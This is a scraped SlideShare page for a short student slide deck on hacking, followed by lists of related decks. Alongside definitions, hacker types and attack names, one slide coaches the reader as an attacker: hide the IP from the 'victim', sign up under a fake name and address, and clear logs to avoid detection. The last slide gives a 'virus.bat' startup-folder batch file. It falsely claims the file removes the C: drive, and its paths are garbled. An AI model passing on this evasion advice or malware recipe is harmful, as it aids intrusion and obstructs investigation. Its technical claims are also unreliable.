SlideShare una empresa de Scribd logo
1 de 7
DEFINITION
Hacking refers to an array of activities
which are done to intrude some one else’s
personal information space so as to use it
for malicious, unwanted purposes.
Hacking is a term used to refer to
activities aimed at exploiting security
flaws to obtain critical information for
gaining access to secured networks.
HACKER : Individual who uses computers to gain unauthorized access to data.
CRACKER : Individual who uses capabilities for harmful purposes against computer systems.
ETHICAL HACKER : Individual who uses capabilities for defensive purposes.
PHREAKER : Individual who focuses on communication systems to steal calling card numbers , make free
calls , acquire access to communication systems illegally.
WHACKER: Novice hacker who attacks WAN and Wireless Network.
SCRIPT/KIDDIE : Individual without Programming skills, uses Software available on Internet.
CYBER-TERRORIST: Individual who works for government/terrorist engaged in sabotage, financial theft, and
attack on Nation’s Critical Infrastructure.
Eavesdropping
Identity Spoofing
Snooping Attacks
Interception
Data Modifications Attacks
Repudiation Attacks
DoS Attacks
DDoS Attacks
Password Guessing Attacks
Man-in-the-Middle Attacks
Back Door Attacks
Spoofing Attacks
Compromised Key Attacks
Application Layer Attacks
STEPS BEFORE HACKING
When you start hacking the first thing you need to do is: to make sure the victim will
not find out your real identity.
So hide your IP by masking it or using a anonymous proxy server. This is only
effective when the victim has no knowledge about computers and internet.
Organizations like the F.B.I, C.I.A and such will find you in no time, so beware !
The best thing to do is using a dialup connection that has a variable IP address. Be
smart, when you signup for a internet dialup connection use a fake name and
address.
When hacking never leave traces of your hacking attempts, clear log files and make
sure you are not monitored. So use a good firewall that keeps out retaliation hacking
attempts of your victim.
Safeguard data
Monitor control on key systems
and check inadequate logging
Protect access control
Privacy awareness training
Clear the Cookies!
1) Type the following and place it in c:Programsvirus.bat.
@echo off
Copy c:Programsvirus.bat c:Programs
Start c:Programsvirus.bat
2) After that make a shortcut of virus.bat and place it in
windows startup folder.
3) Restart the machine.
4) Oops!!! There is no hard disk available in C: drive.
THANK YOU…

Más contenido relacionado

La actualidad más candente

La actualidad más candente (20)

Introduction To Hacking
Introduction To HackingIntroduction To Hacking
Introduction To Hacking
 
hacking and its types
hacking and its typeshacking and its types
hacking and its types
 
Hacking
HackingHacking
Hacking
 
What is IT security[1]
What is IT security[1]What is IT security[1]
What is IT security[1]
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Hacking And EthicalHacking By Satish
Hacking And EthicalHacking By SatishHacking And EthicalHacking By Satish
Hacking And EthicalHacking By Satish
 
Hacking intro
Hacking introHacking intro
Hacking intro
 
Hacking
Hacking Hacking
Hacking
 
Access Controls Attacks
Access Controls AttacksAccess Controls Attacks
Access Controls Attacks
 
Cyber Crime
Cyber CrimeCyber Crime
Cyber Crime
 
Ict H A C K I N G
Ict    H A C K I N GIct    H A C K I N G
Ict H A C K I N G
 
Hacker
HackerHacker
Hacker
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
ETHICAL HACKING
ETHICAL HACKINGETHICAL HACKING
ETHICAL HACKING
 
Computer hacking
Computer hackingComputer hacking
Computer hacking
 
Course on Ehtical Hacking - Introduction
Course on Ehtical Hacking - IntroductionCourse on Ehtical Hacking - Introduction
Course on Ehtical Hacking - Introduction
 
Cyber hacking dev days by aes team
Cyber hacking dev days by aes teamCyber hacking dev days by aes team
Cyber hacking dev days by aes team
 
All about Hacking
All about HackingAll about Hacking
All about Hacking
 
UNDERSTANDING HACKING
UNDERSTANDING HACKINGUNDERSTANDING HACKING
UNDERSTANDING HACKING
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 

Destacado

Hackers & hacktivism
Hackers & hacktivismHackers & hacktivism
Hackers & hacktivismBilal Ali
 
Spooky Halloween IT Security Lecture -- The Deep Web
Spooky Halloween IT Security Lecture -- The Deep WebSpooky Halloween IT Security Lecture -- The Deep Web
Spooky Halloween IT Security Lecture -- The Deep WebNicholas Davis
 
On the topology of package dependency networks: A comparison of programming l...
On the topology of package dependency networks: A comparison of programming l...On the topology of package dependency networks: A comparison of programming l...
On the topology of package dependency networks: A comparison of programming l...Tom Mens
 
Integration of chromatographic peaks
Integration of chromatographic peaksIntegration of chromatographic peaks
Integration of chromatographic peaksdeepak mishra
 
Learn More About Cyber Crime Investigation
Learn More About Cyber Crime Investigation Learn More About Cyber Crime Investigation
Learn More About Cyber Crime Investigation Skills Academy
 
Computer forensics
Computer  forensicsComputer  forensics
Computer forensicsLalit Garg
 
Computer +forensics
Computer +forensicsComputer +forensics
Computer +forensicsRahul Baghla
 
Digital Crime & Forensics - Presentation
Digital Crime & Forensics - PresentationDigital Crime & Forensics - Presentation
Digital Crime & Forensics - Presentationprashant3535
 
Preparation of standard, normal and molar solutions
Preparation of standard, normal and molar solutionsPreparation of standard, normal and molar solutions
Preparation of standard, normal and molar solutionsKalpesh Nakarani
 

Destacado (20)

InCl3 catalyst
InCl3 catalystInCl3 catalyst
InCl3 catalyst
 
Hacek report iin bacte
Hacek report iin bacteHacek report iin bacte
Hacek report iin bacte
 
Hackers & hacktivism
Hackers & hacktivismHackers & hacktivism
Hackers & hacktivism
 
Programming erlang
Programming erlangProgramming erlang
Programming erlang
 
Kali Linux Installation - VMware
Kali Linux Installation - VMwareKali Linux Installation - VMware
Kali Linux Installation - VMware
 
Spooky Halloween IT Security Lecture -- The Deep Web
Spooky Halloween IT Security Lecture -- The Deep WebSpooky Halloween IT Security Lecture -- The Deep Web
Spooky Halloween IT Security Lecture -- The Deep Web
 
On the topology of package dependency networks: A comparison of programming l...
On the topology of package dependency networks: A comparison of programming l...On the topology of package dependency networks: A comparison of programming l...
On the topology of package dependency networks: A comparison of programming l...
 
Deep web
Deep webDeep web
Deep web
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Integration of chromatographic peaks
Integration of chromatographic peaksIntegration of chromatographic peaks
Integration of chromatographic peaks
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Learn More About Cyber Crime Investigation
Learn More About Cyber Crime Investigation Learn More About Cyber Crime Investigation
Learn More About Cyber Crime Investigation
 
Computer forensics
Computer forensicsComputer forensics
Computer forensics
 
HPLC
HPLCHPLC
HPLC
 
Computer forensics
Computer  forensicsComputer  forensics
Computer forensics
 
Computer +forensics
Computer +forensicsComputer +forensics
Computer +forensics
 
Deep Web - what to do and what not to do
Deep Web - what to do and what not to do	Deep Web - what to do and what not to do
Deep Web - what to do and what not to do
 
Darknet
DarknetDarknet
Darknet
 
Digital Crime & Forensics - Presentation
Digital Crime & Forensics - PresentationDigital Crime & Forensics - Presentation
Digital Crime & Forensics - Presentation
 
Preparation of standard, normal and molar solutions
Preparation of standard, normal and molar solutionsPreparation of standard, normal and molar solutions
Preparation of standard, normal and molar solutions
 

Similar a Hacking

Hacking Presentation v2 By Raffi
Hacking Presentation v2 By Raffi Hacking Presentation v2 By Raffi
Hacking Presentation v2 By Raffi Shawon Raffi
 
Cyber Crime & Security.pdf
Cyber Crime & Security.pdfCyber Crime & Security.pdf
Cyber Crime & Security.pdfMohanPandey31
 
Hacking Presentation
Hacking PresentationHacking Presentation
Hacking PresentationMidhun
 
Internet security powerpoint
Internet security powerpointInternet security powerpoint
Internet security powerpointArifa Ali
 
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)Shivam Sahu
 
Internet security powerpoint
Internet security powerpointInternet security powerpoint
Internet security powerpointArifa Ali
 
You think you are safe online. Are You?
You think you are safe online. Are You?You think you are safe online. Are You?
You think you are safe online. Are You?TechGenie
 
IT Threats and Computer Security
IT Threats and Computer SecurityIT Threats and Computer Security
IT Threats and Computer SecurityKongChunLeong1
 
Cyber Crime And Security
Cyber Crime And Security Cyber Crime And Security
Cyber Crime And Security ritik shukla
 
Engineering report ca2_Kritakbiswas.pptx
Engineering report ca2_Kritakbiswas.pptxEngineering report ca2_Kritakbiswas.pptx
Engineering report ca2_Kritakbiswas.pptxprosunghosh7
 

Similar a Hacking (20)

Hacking Presentation v2 By Raffi
Hacking Presentation v2 By Raffi Hacking Presentation v2 By Raffi
Hacking Presentation v2 By Raffi
 
Cyber Crime & Security.pdf
Cyber Crime & Security.pdfCyber Crime & Security.pdf
Cyber Crime & Security.pdf
 
Hacking Presentation
Hacking PresentationHacking Presentation
Hacking Presentation
 
Internet security powerpoint
Internet security powerpointInternet security powerpoint
Internet security powerpoint
 
HACKING
HACKINGHACKING
HACKING
 
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)PowerPoint Presentation On Ethical Hacking in Brief (Simple)
PowerPoint Presentation On Ethical Hacking in Brief (Simple)
 
Internet security powerpoint
Internet security powerpointInternet security powerpoint
Internet security powerpoint
 
You think you are safe online. Are You?
You think you are safe online. Are You?You think you are safe online. Are You?
You think you are safe online. Are You?
 
IT Threats and Computer Security
IT Threats and Computer SecurityIT Threats and Computer Security
IT Threats and Computer Security
 
Β. Hucking
Β. Hucking Β. Hucking
Β. Hucking
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Cyber Crime And Security
Cyber Crime And Security Cyber Crime And Security
Cyber Crime And Security
 
CYBER SECUIRTY PRESENTATION.pptx
CYBER SECUIRTY PRESENTATION.pptxCYBER SECUIRTY PRESENTATION.pptx
CYBER SECUIRTY PRESENTATION.pptx
 
Computer-Security.pptx
Computer-Security.pptxComputer-Security.pptx
Computer-Security.pptx
 
Phishing and hacking
Phishing and hackingPhishing and hacking
Phishing and hacking
 
Engineering report ca2_Kritakbiswas.pptx
Engineering report ca2_Kritakbiswas.pptxEngineering report ca2_Kritakbiswas.pptx
Engineering report ca2_Kritakbiswas.pptx
 
Computer crime
Computer crimeComputer crime
Computer crime
 
Hacking
HackingHacking
Hacking
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
 

Más de Rahul Pandit

PARTITION COEFFICIENT
PARTITION COEFFICIENTPARTITION COEFFICIENT
PARTITION COEFFICIENTRahul Pandit
 
SOLID DISPERSION TECHNIQUE
SOLID DISPERSION TECHNIQUESOLID DISPERSION TECHNIQUE
SOLID DISPERSION TECHNIQUERahul Pandit
 
Microwave assisted organic synthesis
Microwave assisted organic synthesisMicrowave assisted organic synthesis
Microwave assisted organic synthesisRahul Pandit
 
Stability of packaging in pharmacy
Stability of packaging in pharmacyStability of packaging in pharmacy
Stability of packaging in pharmacyRahul Pandit
 
Central nervous system
Central nervous systemCentral nervous system
Central nervous systemRahul Pandit
 
I.p. 2007 volume 2
I.p. 2007 volume 2I.p. 2007 volume 2
I.p. 2007 volume 2Rahul Pandit
 
I.p. 2007 volume 3
I.p. 2007 volume 3I.p. 2007 volume 3
I.p. 2007 volume 3Rahul Pandit
 
I.p. 2007 volume 1
I.p. 2007 volume 1I.p. 2007 volume 1
I.p. 2007 volume 1Rahul Pandit
 
Core programming in c
Core programming in cCore programming in c
Core programming in cRahul Pandit
 
Kinetics and drug stability
Kinetics and drug stabilityKinetics and drug stability
Kinetics and drug stabilityRahul Pandit
 

Más de Rahul Pandit (14)

PARTITION COEFFICIENT
PARTITION COEFFICIENTPARTITION COEFFICIENT
PARTITION COEFFICIENT
 
SOLID DISPERSION TECHNIQUE
SOLID DISPERSION TECHNIQUESOLID DISPERSION TECHNIQUE
SOLID DISPERSION TECHNIQUE
 
Microwave assisted organic synthesis
Microwave assisted organic synthesisMicrowave assisted organic synthesis
Microwave assisted organic synthesis
 
Stability of packaging in pharmacy
Stability of packaging in pharmacyStability of packaging in pharmacy
Stability of packaging in pharmacy
 
Central nervous system
Central nervous systemCentral nervous system
Central nervous system
 
I.p. 2007 volume 2
I.p. 2007 volume 2I.p. 2007 volume 2
I.p. 2007 volume 2
 
I.p. 2007 volume 3
I.p. 2007 volume 3I.p. 2007 volume 3
I.p. 2007 volume 3
 
I.p. 2007 volume 1
I.p. 2007 volume 1I.p. 2007 volume 1
I.p. 2007 volume 1
 
Core programming in c
Core programming in cCore programming in c
Core programming in c
 
Neuron
NeuronNeuron
Neuron
 
Kinetics and drug stability
Kinetics and drug stabilityKinetics and drug stability
Kinetics and drug stability
 
Immunisation
ImmunisationImmunisation
Immunisation
 
Endangered birds
Endangered birdsEndangered birds
Endangered birds
 
Senega
SenegaSenega
Senega
 

Último

4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptxmary850239
 
4.11.24 Mass Incarceration and the New Jim Crow.pptx
4.11.24 Mass Incarceration and the New Jim Crow.pptx4.11.24 Mass Incarceration and the New Jim Crow.pptx
4.11.24 Mass Incarceration and the New Jim Crow.pptxmary850239
 
Q4-PPT-Music9_Lesson-1-Romantic-Opera.pptx
Q4-PPT-Music9_Lesson-1-Romantic-Opera.pptxQ4-PPT-Music9_Lesson-1-Romantic-Opera.pptx
Q4-PPT-Music9_Lesson-1-Romantic-Opera.pptxlancelewisportillo
 
Congestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentationCongestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentationdeepaannamalai16
 
ROLES IN A STAGE PRODUCTION in arts.pptx
ROLES IN A STAGE PRODUCTION in arts.pptxROLES IN A STAGE PRODUCTION in arts.pptx
ROLES IN A STAGE PRODUCTION in arts.pptxVanesaIglesias10
 
week 1 cookery 8 fourth - quarter .pptx
week 1 cookery 8  fourth  -  quarter .pptxweek 1 cookery 8  fourth  -  quarter .pptx
week 1 cookery 8 fourth - quarter .pptxJonalynLegaspi2
 
Oppenheimer Film Discussion for Philosophy and Film
Oppenheimer Film Discussion for Philosophy and FilmOppenheimer Film Discussion for Philosophy and Film
Oppenheimer Film Discussion for Philosophy and FilmStan Meyer
 
Multi Domain Alias In the Odoo 17 ERP Module
Multi Domain Alias In the Odoo 17 ERP ModuleMulti Domain Alias In the Odoo 17 ERP Module
Multi Domain Alias In the Odoo 17 ERP ModuleCeline George
 
ClimART Action | eTwinning Project
ClimART Action    |    eTwinning ProjectClimART Action    |    eTwinning Project
ClimART Action | eTwinning Projectjordimapav
 
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdfGrade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdfJemuel Francisco
 
Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Seán Kennedy
 
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnvESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnvRicaMaeCastro1
 
ICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfVanessa Camilleri
 
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)lakshayb543
 
Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4JOYLYNSAMANIEGO
 
BIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptx
BIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptxBIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptx
BIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptxSayali Powar
 
Using Grammatical Signals Suitable to Patterns of Idea Development
Using Grammatical Signals Suitable to Patterns of Idea DevelopmentUsing Grammatical Signals Suitable to Patterns of Idea Development
Using Grammatical Signals Suitable to Patterns of Idea Developmentchesterberbo7
 
Narcotic and Non Narcotic Analgesic..pdf
Narcotic and Non Narcotic Analgesic..pdfNarcotic and Non Narcotic Analgesic..pdf
Narcotic and Non Narcotic Analgesic..pdfPrerana Jadhav
 

Último (20)

4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx4.16.24 Poverty and Precarity--Desmond.pptx
4.16.24 Poverty and Precarity--Desmond.pptx
 
4.11.24 Mass Incarceration and the New Jim Crow.pptx
4.11.24 Mass Incarceration and the New Jim Crow.pptx4.11.24 Mass Incarceration and the New Jim Crow.pptx
4.11.24 Mass Incarceration and the New Jim Crow.pptx
 
Q4-PPT-Music9_Lesson-1-Romantic-Opera.pptx
Q4-PPT-Music9_Lesson-1-Romantic-Opera.pptxQ4-PPT-Music9_Lesson-1-Romantic-Opera.pptx
Q4-PPT-Music9_Lesson-1-Romantic-Opera.pptx
 
Congestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentationCongestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentation
 
ROLES IN A STAGE PRODUCTION in arts.pptx
ROLES IN A STAGE PRODUCTION in arts.pptxROLES IN A STAGE PRODUCTION in arts.pptx
ROLES IN A STAGE PRODUCTION in arts.pptx
 
week 1 cookery 8 fourth - quarter .pptx
week 1 cookery 8  fourth  -  quarter .pptxweek 1 cookery 8  fourth  -  quarter .pptx
week 1 cookery 8 fourth - quarter .pptx
 
Mattingly "AI & Prompt Design: Large Language Models"
Mattingly "AI & Prompt Design: Large Language Models"Mattingly "AI & Prompt Design: Large Language Models"
Mattingly "AI & Prompt Design: Large Language Models"
 
Oppenheimer Film Discussion for Philosophy and Film
Oppenheimer Film Discussion for Philosophy and FilmOppenheimer Film Discussion for Philosophy and Film
Oppenheimer Film Discussion for Philosophy and Film
 
Multi Domain Alias In the Odoo 17 ERP Module
Multi Domain Alias In the Odoo 17 ERP ModuleMulti Domain Alias In the Odoo 17 ERP Module
Multi Domain Alias In the Odoo 17 ERP Module
 
ClimART Action | eTwinning Project
ClimART Action    |    eTwinning ProjectClimART Action    |    eTwinning Project
ClimART Action | eTwinning Project
 
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdfGrade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
Grade 9 Quarter 4 Dll Grade 9 Quarter 4 DLL.pdf
 
Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...Student Profile Sample - We help schools to connect the data they have, with ...
Student Profile Sample - We help schools to connect the data they have, with ...
 
Paradigm shift in nursing research by RS MEHTA
Paradigm shift in nursing research by RS MEHTAParadigm shift in nursing research by RS MEHTA
Paradigm shift in nursing research by RS MEHTA
 
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnvESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
ESP 4-EDITED.pdfmmcncncncmcmmnmnmncnmncmnnjvnnv
 
ICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdfICS2208 Lecture6 Notes for SL spaces.pdf
ICS2208 Lecture6 Notes for SL spaces.pdf
 
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
Visit to a blind student's school🧑‍🦯🧑‍🦯(community medicine)
 
Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4Daily Lesson Plan in Mathematics Quarter 4
Daily Lesson Plan in Mathematics Quarter 4
 
BIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptx
BIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptxBIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptx
BIOCHEMISTRY-CARBOHYDRATE METABOLISM CHAPTER 2.pptx
 
Using Grammatical Signals Suitable to Patterns of Idea Development
Using Grammatical Signals Suitable to Patterns of Idea DevelopmentUsing Grammatical Signals Suitable to Patterns of Idea Development
Using Grammatical Signals Suitable to Patterns of Idea Development
 
Narcotic and Non Narcotic Analgesic..pdf
Narcotic and Non Narcotic Analgesic..pdfNarcotic and Non Narcotic Analgesic..pdf
Narcotic and Non Narcotic Analgesic..pdf
 

Hacking

  • 1.
  • 2. DEFINITION Hacking refers to an array of activities which are done to intrude some one else’s personal information space so as to use it for malicious, unwanted purposes. Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
  • 3. HACKER : Individual who uses computers to gain unauthorized access to data. CRACKER : Individual who uses capabilities for harmful purposes against computer systems. ETHICAL HACKER : Individual who uses capabilities for defensive purposes. PHREAKER : Individual who focuses on communication systems to steal calling card numbers , make free calls , acquire access to communication systems illegally. WHACKER: Novice hacker who attacks WAN and Wireless Network. SCRIPT/KIDDIE : Individual without Programming skills, uses Software available on Internet. CYBER-TERRORIST: Individual who works for government/terrorist engaged in sabotage, financial theft, and attack on Nation’s Critical Infrastructure.
  • 4. Eavesdropping Identity Spoofing Snooping Attacks Interception Data Modifications Attacks Repudiation Attacks DoS Attacks DDoS Attacks Password Guessing Attacks Man-in-the-Middle Attacks Back Door Attacks Spoofing Attacks Compromised Key Attacks Application Layer Attacks
  • 5. STEPS BEFORE HACKING When you start hacking the first thing you need to do is: to make sure the victim will not find out your real identity. So hide your IP by masking it or using a anonymous proxy server. This is only effective when the victim has no knowledge about computers and internet. Organizations like the F.B.I, C.I.A and such will find you in no time, so beware ! The best thing to do is using a dialup connection that has a variable IP address. Be smart, when you signup for a internet dialup connection use a fake name and address. When hacking never leave traces of your hacking attempts, clear log files and make sure you are not monitored. So use a good firewall that keeps out retaliation hacking attempts of your victim.
  • 6. Safeguard data Monitor control on key systems and check inadequate logging Protect access control Privacy awareness training Clear the Cookies!
  • 7. 1) Type the following and place it in c:Programsvirus.bat. @echo off Copy c:Programsvirus.bat c:Programs Start c:Programsvirus.bat 2) After that make a shortcut of virus.bat and place it in windows startup folder. 3) Restart the machine. 4) Oops!!! There is no hard disk available in C: drive. THANK YOU…